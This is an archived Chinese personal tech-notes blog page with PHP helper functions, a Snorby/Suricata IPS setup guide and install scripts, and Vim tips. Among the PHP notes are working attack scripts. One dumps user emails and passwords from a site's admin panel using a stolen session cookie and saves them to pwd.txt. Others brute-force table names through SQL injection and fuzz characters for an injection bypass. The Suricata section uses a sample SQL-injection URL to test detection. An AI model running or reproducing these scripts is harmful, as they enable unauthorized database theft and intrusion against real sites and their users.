月度归档:2016年12月
snorby mark
在
bundle exec rake snorby:setup
这一步时始终过不去。
报
No time_zone specified in snorby_config.yml; detected time_zone: US/Eastern 3dd9afd796731d9f406d9cec0088c86e90995d4024acb27fa8710c99a48c1f73e431b6d8957a8de011cad066565c19354c85c5700378efc75d9ca15de46ae2ee [datamapper] Created database 'snorby' rake aborted! TypeError: no implicit conversion of Fixnum into String
看了几遍代码, 没问题,
偶然想到数据库密码为123456
原config/database.yml为:
snorby: &snorby adapter: mysql username: root password: 123456 host: localhost
改为 密码加上双引号:
snorby: &snorby adapter: mysql username: root password: "123456" host: localhost
php mark
#php 日期转换成TZ格式
$time_tz_str = str_replace('+00:00', 'Z', gmdate('c', time())); #2020-07-21T12:11:11Z
#trim 移除字符串
function strim($string,$removestring){ if (!is_string($string) || !is_string($removestring)){ return $string; } $result = preg_replace("/^{$removestring}|{$removestring}$/", "", $string); return $result; }
#这样改strim会更好一点 function strim($string,$removestring=''){ if (!is_string($string)){ return $string; } if (!$removestring){ return trim($string); } $result = preg_replace("/^{$removestring}|{$removestring}$/", "", $string); return $result; }
#curl request
function curl_request($url,$post='',$cookie='', $returnCookie=0){ $curl = curl_init(); curl_setopt($curl, CURLOPT_URL, $url); curl_setopt($curl, CURLOPT_USERAGENT, 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)'); curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($curl, CURLOPT_AUTOREFERER, 1); curl_setopt($curl, CURLOPT_REFERER, "http://XXX"); if($post) { curl_setopt($curl, CURLOPT_POST, 1); //curl_setopt($curl, CURLOPT_POSTFIELDS, http_build_query($post)); curl_setopt($curl, CURLOPT_POSTFIELDS, $post); } if($cookie) { curl_setopt($curl, CURLOPT_COOKIE, $cookie); } curl_setopt($curl, CURLOPT_HEADER, $returnCookie); curl_setopt($curl, CURLOPT_TIMEOUT, 10); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 1); //ssl 这两行代码是为了能走https的请求,http请求放着也没有影响 curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, FALSE); //ssl 这两行代码是为了能走https的请求,http请求放着也没有影响 $data = curl_exec($curl); if (curl_errno($curl)) { return curl_error($curl); } curl_close($curl); if($returnCookie){ list($header, $body) = explode("\r\n\r\n", $data, 2); preg_match_all("/Set\-Cookie:([^;]*);/", $header, $matches); $info['cookie'] = substr($matches[1][0], 1); $info['content'] = $body; return $info; }else{ return $data; } }
#php remove bom str
function str_remove_bom($str){ $charset[1] = substr($str, 0, 1); $charset[2] = substr($str, 1, 1); $charset[3] = substr($str, 2, 1); if (ord($charset[1]) == 239 && ord($charset[2]) == 187 && ord($charset[3]) == 191) { $rest = substr($str, 3); return $rest; } else{ return $str; } }
#php实现内存地址反转
function array_endtostart($hex){ $a_tmp=str_split($hex,2); $result=array_reverse($a_tmp); $hexstr=join("",$result); return $hexstr; }
#php 实现汇编中的pxor
function xortnew($a,$b){ $a_tmp=str_split($a,2); $b_tmp=str_split($b,2); $result=""; foreach($a_tmp as $key=>$value){ $a_b=hex2bin($value); $b_b=hex2bin($b_tmp[$key]); $r = $a_b ^ $b_b; $result .=bin2hex($r); } return $result; } var_dump(xortnew("3e213b21343d3c3e00000002253a600c","0c0c0c0c0c0c0c0c0c0c0c0c0c0c0c0c"));
#php 查找字符串与替换
function tapreplace($str){ $newstr=preg_replace_callback("/(<pre.*<\/pre>)/s",function ($match){ $text=preg_replace("/\t/"," ",$match[0]); $text=preg_replace("/'/","'",$text); $text=preg_replace("/#/","#",$text); $text=preg_replace("/\"/",""",$text); $text=preg_replace("/'/","'",$text); return $text; },$str); return $newstr; }
#dokuwiki在php7下报operator not supported for strings in 错
inc\lessc.inc.php
public $importDir = ''; #改为 public $importDir = array();
#CryptoJS 与php互通
#CryptoJS 中 #128位AES加密 var key = CryptoJS.lib.WordArray.random(16); var iv = CryptoJS.lib.WordArray.random(16); var encrypted = CryptoJS.AES.encrypt("teststring", key, {iv:iv}); #php: $key_str = hex2bin('xxxxxxx'); $iv_str = hex2bin('xxxxxxx'); $str="xxxxx"; $result =openssl_decrypt($str,'aes-128-cbc',$key_str,false,$iv_str); #192 aes var key = CryptoJS.lib.WordArray.random(24); var iv = CryptoJS.lib.WordArray.random(16); var encrypted = CryptoJS.AES.encrypt("teststring", key, {iv:iv}); #php: $key_str = hex2bin('xxxxxxx'); $iv_str = hex2bin('xxxxxxx'); $str="xxxxx"; $result =openssl_decrypt($str,'aes-192-cbc',$key_str,false,$iv_str); #256 aes: var key = CryptoJS.lib.WordArray.random(32); var iv = CryptoJS.lib.WordArray.random(16); var encrypted = CryptoJS.AES.encrypt("teststring", key, {iv:iv}); #php: $key_str = hex2bin('xxxxxxx'); $iv_str = hex2bin('xxxxxxx'); $str="xxxxx"; $result =openssl_decrypt($str,'aes-256-cbc',$key_str,false,$iv_str);
#php try catch warning
set_error_handler(function($errno, $errstr, $errfile, $errline, array $errcontext) { // error was suppressed with the @-operator if (0 === error_reporting()) { return false; } throw new ErrorException($errstr, 0, $errno, $errfile, $errline); }); #然后直接try就可以了 try{ if (preg_match("/{$rule}/", $result['url'])) { $end['match']=1; $end['code_error']=0; } if ($result['code'] == 404) { $end['code_error']=1; } }catch (Exception $e){ var_dump($rule); }
#数组对象转换
/** * 数组 转 对象 * * @param array $arr 数组 * @return object */ function array_to_object($arr) { if (gettype($arr) != 'array') { return; } foreach ($arr as $k => $v) { if (gettype($v) == 'array' || gettype($v) == 'object') { $arr[$k] = (object)array_to_object($v); } } return (object)$arr; } /** * 对象 转 数组 * * @param object $obj 对象 * @return array */ function object_to_array($obj) { $obj = (array)$obj; foreach ($obj as $k => $v) { if (gettype($v) == 'resource') { return; } if (gettype($v) == 'object' || gettype($v) == 'array') { $obj[$k] = (array)object_to_array($v); } } return $obj; }
#一个无极限分类
function get_tree($result){ $tree = array(); foreach($result as $item){ if(isset($result[$item['pid']])){ $result[$item['pid']]['son'][] = &$result[$item['pro_id']]; }else{ $tree[] = &$result[$item['pro_id']]; } } return $tree; } //生成无极限的数据 //用递归展示处理的数据 function getviewdata($data,$level=0){ foreach($data as $key=>$value){ for($i=0;$i<=$level;$i++){ echo '  '; } echo $value['pro_name']; echo '<br>'; if(!empty($value['son'])){ getviewdata($value['son'],$level+1); } } } getviewdata($xx);
#某脱库脚本
function getuidinfo($i){ sleep(0.5); $url="http://www.xxx.cn/admin.php?s=/product/order/index/uid/{$i}"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/xxx (KHTML, like Gecko) Chrome/xxx Safari/xxx'); curl_setopt($ch, CURLOPT_REFERER,'http://www.xxx.cn/admin.php?s=/product/order/index/uid/24'); curl_setopt($ch, CURLOPT_COOKIE,'PHPSESSID=vhbnfht14o07cvrhnuq5ir6o77'); $output = curl_exec($ch); curl_close($ch); preg_match_all('/<tbody>.*<\/tbody>/ims',$output,$result); if(!isset($result[0][0]) || !$result[0][0]){ return array(); } $tmp_array= explode("\n",$result[0][0]); if(!$tmp_array){ return array(); } $result_out=array(); foreach ($tmp_array as $a_tmp){ $a_tmp = trim($a_tmp); if(!preg_match('/^<td>\d+<\/td>/',$a_tmp)){ continue; } preg_match('#^<td>\d+</td><td>.*</td><td>(.*)</td><td>\d+\.\d+</td><td>[^<]*</td><td>[^<]*</td><td><a[^>]*>([^<]*)</a></td>#',$a_tmp,$a_result); $result_out[]=$a_result[1]; $account_name = $a_result['2']; } if (!isset($account_name)){ return array(); } $result_out=array_unique($result_out); $return['email']=$account_name; $return['pid']=$result_out; return $return; } function getproduct($product_id){ sleep(0.5); $url="http://www.xxx.cn/admin.php?s=/product/user/index&keyword={$product_id}"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/xxx (KHTML, like Gecko) Chrome/xxx Safari/xxx'); curl_setopt($ch, CURLOPT_REFERER,'http://www.xxx.cn/admin.php?s=/product/order/index/uid/24'); curl_setopt($ch, CURLOPT_COOKIE,'PHPSESSID=vhbnfht14o07cvrhnuq5ir6o77'); $output = curl_exec($ch); curl_close($ch); preg_match_all('/<tbody>.*<\/tbody>/ims',$output,$result); if(!isset($result[0][0]) || !$result[0][0]){ return array(); } $tmp_array= explode("\n",$result[0][0]); if(!$tmp_array){ return array(); } $result=array(); foreach ($tmp_array as $a_tmp){ $a_tmp = trim($a_tmp); if(!preg_match('/^<td>\d+<\/td>/',$a_tmp)){ continue; } preg_match('#^<td>\d+</td><td><a[^>]*>[^<]*</a></td><td>[^<]*</td><td>([^<]*)</td>#',$a_tmp,$a_result); $result=$a_result[1]; } if(!$result){ return array(); } return $result; } for($i=1;$i<32167;$i++){ $uidinfo = getuidinfo($i); if(!$uidinfo){ continue; } echo $i."\n"; $strs = "uid:{$i} email:".$uidinfo['email'].":"; $pwd_tmp=array(); foreach($uidinfo['pid'] as $pid){ $pwd = getproduct($pid); if(!$pwd){ continue; } $pwd_tmp[]=$pwd; } $pwd_tmp=array_unique($pwd_tmp); $pwd_str =implode("|",$pwd_tmp); $strs .=$pwd_str."\n"; file_put_contents("pwd.txt",$strs,8); sleep(0.5); }
#thinkphp路由模式
http://www.xxx.net/product/index/xxx/id/29192 => http://www.xxx.net/index.php?m=product&c=index&a=xxx&id=29192
#跑表名
set_time_limit(0); $tables = file("tables"); foreach ($tables as $a_tables){ $a_tables = trim($a_tables); $url = "http://www.xxx.net/product/index/xxx/id/29192) and 1=1 and 1=2 union select 29192,29192,29192,2,2,4,5,(select id from ss_{$a_tables} where id>1 limit 0,1 ),7,8,9,10,2 -- a"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HEADER, 1); curl_setopt($ch,CURLOPT_COOKIE,'PHPSESSID=ddk0k3c1q3a9nio7rl4fkihtf4'); $output = curl_exec($ch); curl_close($ch); $garbage = strstr($output, "exist"); if($garbage == false) { echo $a_tables."<br>"; } sleep(2); }
#inject
$i = $_GET['id']; sleep(1); $url = "http://xxx.xxx.net/xxx/index/xxx/id/29192) and 1={$i} --"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch,CURLOPT_COOKIE,'PHPSESSID=ddk0k3c1q3a9nio7rl4fkihtf4'); $output = curl_exec($ch); curl_close($ch); print_r($output);
#fuzz1
<?php $con=mysqli_connect("localhost","root","123456","test"); if (mysqli_connect_errno($con)) { echo 111; exit; } for($i=0;$i<255;$i++) { for($j=0;$j<255;$j++) { $char_str = chr($i); $charj_str = chr($j); $strs = "select count(*) from `information_schema`{$char_str}{$charj_str}`SCHEMATA`"; $result=mysqli_query($con,$strs); $posts = array(); while($row = @mysqli_fetch_array($result)) { $posts[] = $row; } if(isset($posts[0]) && $posts[0][0]==10 ){ echo "<font color=red>aaaa</font>{$i}|{$j}<br>"; } } } mysqli_close($con);
#毫秒
list($usec, $sec) = explode(" ", microtime()); $lusec = sprintf('%03d',$usec*1000);
iptable 流程1
suricata nat下部署
Mark:
实验环境:
最好两台真机,至少一台虚拟机一台真机,不推荐两台实验环境都为虚拟机(两台都是虚拟机时, route表中的可能不会生效)
A:172.20.8.42 IPS (功能)
B:172.20.8.8 pc
要求: B –> A –> inetner B若访问的地址存在攻击行为,则阻断
A:
#安装suricata
apt-get install libpcre3 libpcre3-dbg libpcre3-dev build-essential autoconf automake libtool libpcap-dev libnet1-dev libyaml-0-2 libyaml-dev zlib1g zlib1g-dev libcap-ng-dev libcap-ng0 make libmagic-dev libjansson-dev libjansson4 pkg-config libnetfilter-queue-dev libnetfilter-queue1 libnfnetlink-dev libnfnetlink0 #解决信赖 wget https://github.com/inliniac/suricata/archive/suricata-3.2.zip unar suricata-3.2.zip cd suricata-3.2 git clone https://github.com/OISF/libhtp.git #suricata 信赖libhtp 放到suricata项目目录中 ./configure --enable-nfqueue --enable-pfring --enable-hiredis --prefix=/usr --sysconfdir=/etc --localstatedir=/var make make install make install-conf make install-rules ldconfig
#配置转发环境
echo 1 > /proc/sys/net/ipv4/ip_forward
#配置iptables
iptables -I INPUT -j NFQUEUE && iptables -I OUTPUT -j NFQUEUE &&iptables -I FORWARD -j NFQUEUE && iptables -A FORWARD -m state --state ESTABLISHED,RELATED -j NFQUEUE #若以ids模式运行,则把 NFQUEUE 换成 ACCEPT iptables -t nat -A POSTROUTING -s 172.20.8.5 -j SNAT --to 172.20.8.42 #转发的源地址转换 ,作此步骤才能抓到数据包 ifconfig eth0 -promisc #网卡混杂模式
#修改suricata配置
#suricata.yaml HOME_NET: "![172.20.0.0/16]" #HOME_NET 把外部地址当成目标为自己的就能匹配rules
#启动
suricata -c /etc/suricata/suricata.yaml -q 0
B:
把电脑的网关设置为 172.20.8.42 就行了
#测试注意
最好用浏览器测试:http://xxx.com/xxx.php?id=1 and 1=2 union select id from test where id=1 在/var/log/suricata/fast.log 文件出行记录表示成功
若用curl命令行测试 则应为 curl “http://xxx.com/xxx.php?id=1%20and%201=2%20union%20select%20id%20from%20test%20where%20id=1” #命令行下不会自动把空格转义为%20 若不添加 suricata 识别不了 匹配不了rules
#更新
功能尽量装全
apt-get install libpcre3 libpcre3-dbg libpcre3-dev build-essential autoconf automake libtool libpcap-dev libnet1-dev libyaml-0-2 libyaml-dev zlib1g zlib1g-dev libcap-ng-dev libcap-ng0 make libmagic-dev libjansson-dev libjansson4 pkg-config libprelude-dev liblua5.1-dev libgeoip-dev libhiredis-dev libnetfilter-queue-dev libnetfilter-queue1 libnfnetlink-dev libnfnetlink0 ./configure --enable-nfqueue --enable-pfring --enable-hiredis --prefix=/usr --sysconfdir=/etc --localstatedir=/var --enable-unittests --enable-python --enable-debug --enable-debug-validation --enable-profiling --enable-profiling-locks --enable-lua --enable-geoip --enable-pie --enable-prelude
另在NAT转发下会导致服务端丢失真实源ID,所以另拿一台机器做分析,用iptables做端口镜像(或者daemonlogger)
iptables -A INPUT -i eth0 -p tcp -m tcp --sport 80 -j TEE --gateway 172.20.8.147 iptables -A OUTPUT -o eth0 -p tcp -m tcp --dport 80 -j TEE --gateway 172.20.8.147 #注意,input output 都得镜像过来, 就像nat下不添加iptables的源地址转换,就相当于只有input,suricate 在此种情况下不进行protocol分析。
#若只镜像注入的流量,则在suricata.yaml文件中 不过功能会有BUG,建议镜像双向流量
--set stream.async-oneside=true
#另附suricata snort 一键安装脚本
apt-get install wkhtmltopdf gcc g++ build-essential libssl-dev libreadline6-dev zlib1g-dev libsqlite3-dev libxslt-dev libxml2-dev imagemagick git-core libmysqlclient-dev libmagickwand-dev default-jre ruby ruby-dev libpcre3 libpcre3-dbg libpcre3-dev build-essential autoconf automake libtool libpcap-dev libnet1-dev libyaml-0-2 libyaml-dev zlib1g zlib1g-dev libcap-ng-dev libcap-ng0 make libmagic-dev libjansson-dev libjansson4 pkg-config libprelude-dev liblua5.1-dev libgeoip-dev libhiredis-dev mysql-server apache2 apache2-dev libapr1-dev libaprutil1-dev libcurl4-openssl-dev libpcre3 libpcre3-dbg libpcre3-dev build-essential autoconf automake libtool libpcap-dev libnet1-dev libyaml-0-2 libyaml-dev zlib1g zlib1g-dev libcap-ng-dev libcap-ng0 make libmagic-dev git pkg-config libnss3-dev libnspr4-dev wget mysql-client libmysqlclient-dev libdumbnet-dev libmysqlclient18 flex bison libpq-dev postgresql-server-dev-all libdnet-dev unar #install suricata begin cd /tmp wget https://github.com/inliniac/suricata/archive/suricata-3.2.zip unar suricata-3.2.zip cd suricata-suricata-3.2 git clone https://github.com/OISF/libhtp.git #suricata 信赖libhtp 放到suricata项目目录中 ./autogen.sh ./configure --enable-nfqueue --enable-pfring --enable-hiredis --prefix=/usr --sysconfdir=/etc --localstatedir=/var --enable-unittests --enable-python --enable-debug --enable-debug-validation --enable-profiling --enable-profiling-locks --enable-lua --enable-geoip --enable-pie --enable-prelude make make install make install-conf make install-rules ldconfig sed -i "s|windows: [0.0.0.0/0].*|#windows: [0.0.0.0/0]|g" /etc/suricata/suricata.yaml perl -0777 -i -pe "s/- unified2-alert:\s*enabled:.*/- unified2-alert:\n enabled: yes/g" /etc/suricata/suricata.yaml #install suricata end #install snorby begin gpg --keyserver hkp://keys.gnupg.net --recv-keys 409B6B1796C275462A1703113804BB82D39DC0E3 curl -sSL https://get.rvm.io | bash -s stable source /etc/profile.d/rvm.sh rvm install ruby-2.2.4 rvm use ruby-2.2.4 --default gem sources --add https://gems.ruby-china.org/ --remove https://rubygems.org/ gem install thor i18n bundler tzinfo builder memcache-client rack rack-test erubis mail rack-mount rails sqlite3 arel ezprint rake activesupport minitest bundle config mirror.https://rubygems.org https://gems.ruby-china.org git clone http://github.com/Snorby/snorby.git --depth=1 /var/www/snorby cp /var/www/snorby/config/database.yml.example /var/www/snorby/config/database.yml cp /var/www/snorby/config/snorby_config.yml.example /var/www/snorby/config/snorby_config.yml sed -i "s/password: .*\$/password: \"123456\"/" /var/www/snorby/config/database.yml sed -i "s/domain: .*\$/domain: 'localhost:3000'/" /var/www/snorby/config/snorby_config.yml sed -i "s/wkhtmltopdf: .*\$/wkhtmltopdf: wkhtmltopdf/" /var/www/snorby/config/snorby_config.yml sed -i "s#rules:#rules: \n - \"/etc/suricata/rules/\"#g" /var/www/snorby/config/snorby_config.yml cd /var/www/snorby/ && bundle update activesupport railties rails cd /var/www/snorby/ && bundle install cd /var/www/snorby/ && bundle exec rake snorby:setup RAILS_ENV=production chown www-data:www-data /var/www/snorby -R cat <<EOT >> /etc/apache2/sites-available/snorby.conf <VirtualHost *:80> ServerAdmin webmaster@localhost DocumentRoot /var/www/snorby/public <Directory "/var/www/snorby/public"> AllowOverride all Order deny,allow Allow from all Options -MultiViews </Directory> </VirtualHost> EOT a2dissite 000-default.conf a2ensite snorby.conf gem install --no-ri --no-rdoc passenger cd /var/www/snorby/ && passenger-install-apache2-module -a 2> /tmp/.passenger_error.txt 1> /tmp/.passenger_compile_out sed -n '/LoadModule passenger_module \/usr\//,/<\/IfModule>/p' /tmp/.passenger_compile_out > /etc/apache2/mods-available/passenger.load a2enmod passenger a2enmod rewrite service apache2 restart cd /var/www/snorby/ && bundle pack cd /var/www/snorby/ && bundle install --path vender/cache service apache2 restart #install snorby end #install barnyard2 begin cd /tmp wget -q https://www.snort.org/downloads/snort/daq-2.0.6.tar.gz if [ -d "/tmp/daq-2.0.6" ]; then rm -r /tmp/daq-2.0.6 fi tar xzf daq-2.0.6.tar.gz cd daq-2.0.6 ./configure && make && make install ln -s /usr/include/dumbnet.h /usr/include/dnet.h cd /tmp/ && git clone https://github.com/firnsy/barnyard2 --depth=1 cd barnyard2 ./autogen.sh autoreconf --force --install ./configure --with-mysql --with-mysql-libraries=/usr/lib/x86_64-linux-gnu/ make && make install cp /tmp/barnyard2/etc/barnyard2.conf /etc/suricata/ sed -i "s/#config interface:\s\+eth0/config interface: eth0/g" /etc/suricata/barnyard2.conf sed -i "s/#config daemon/config daemon/g" /etc/suricata/barnyard2.conf sed -i "s/#config verbose/config verbose/g" /etc/suricata/barnyard2.conf sed -i "s;#config waldo_file:.*;config waldo_file: /var/log/suricata/suricata.waldo;" /etc/suricata/barnyard2.conf sed -i "s#config reference_file:\s\+/etc/.*#config reference_file: /etc/suricata/reference.config#g" /etc/suricata/barnyard2.conf sed -i "s#config classification_file:\s\+/etc/.*#config classification_file: /etc/suricata/classification.config#g" /etc/suricata/barnyard2.conf sed -i "s#config gen_file:\s\+/etc/.*#config gen_file: /etc/suricata/rules/gen-msg.map#g" /etc/suricata/barnyard2.conf sed -i "s#config sid_file:\s\+/etc/.*#config sid_file: /etc/suricata/rules/sid-msg.map#g" /etc/suricata/barnyard2.conf echo "output database: log, mysql, user=root password=123456 dbname=snorby host=localhost sensor_name=sensor1" >> /etc/suricata/barnyard2.conf mkdir /var/log/barnyard2 cat << 'EOT' >> /etc/init.d/barnyard2 #!/bin/sh case $1 in start) echo "starting $0..." sudo barnyard2 -c /etc/suricata/barnyard2.conf -d /var/log/suricata -f unified2.alert -w /var/log/suricata/suricata.waldo echo -e 'done.' ;; stop) echo "stopping $0..." killall barnyard2 echo -e 'done.' ;; restart) $0 stop $0 start ;; *) echo "usage: $0 (start|stop|restart)" ;; esac EOT chmod 700 /etc/init.d/barnyard2 update-rc.d barnyard2 defaults 21 00 #install end begin cd /var/www/snorby bundle exec rake snorby:update RAILS_ENV=production suricata -c /etc/suricata/suricata.yaml -i eth0 -D barnyard2 -c /etc/suricata/barnyard2.conf -d /var/log/suricata -f unified2.alert -w /var/log/suricata/suricata.waldo -D
#开机启动snorby worker
source /etc/profile.d/rvm.sh rvm use ruby-2.2.4 --default cd /var/www/snorby bundle exec rake snorby:update RAILS_ENV=production
#mark
VIM mark
#vim的搜索是否区分大小写
#大小写检索:默认是区分大小写的 :set ignorecase 或者 :set ic #恢复区分大小写: :set noignorecase 或者 :set noic
#vim中删除不包含关键字的行 刚好与g 命令相反
:g/pattern/d 是找到pattern, 删之 :v/pattern/d 是找到非pattern,删之
#vim中删除关键字的行
:g/xxxx/d :g/^xxxx/d :g/xxxx$/d
#修改默认 mouse=v
#文件位置:/usr/share/vim/vim81/defaults.vim if has('mouse') set mouse=a endif #改为 if has('mouse') set mouse=v endif
#AnsiEsc 终端高亮显示到VIM中(如ls grep等结果中的高亮)
#http://www.vim.org/scripts/script.php?script_id=4979 (新版本地址) #https://github.com/powerman/vim-plugin-AnsiEsc (github) wget http://www.vim.org/scripts/download_script.php?src_id=24019 vim AnsiEsc.vmb :so % test: ls -al /etc --color=always > /tmp/a.txt && vim /tmp/a.txt
#编码切换
#先下载fencview.vim到plugin文件夹中 #~/.vim/vimrc "关闭自动检测 let g:fencview_autodetect=0 map <F2> :FencView<cr>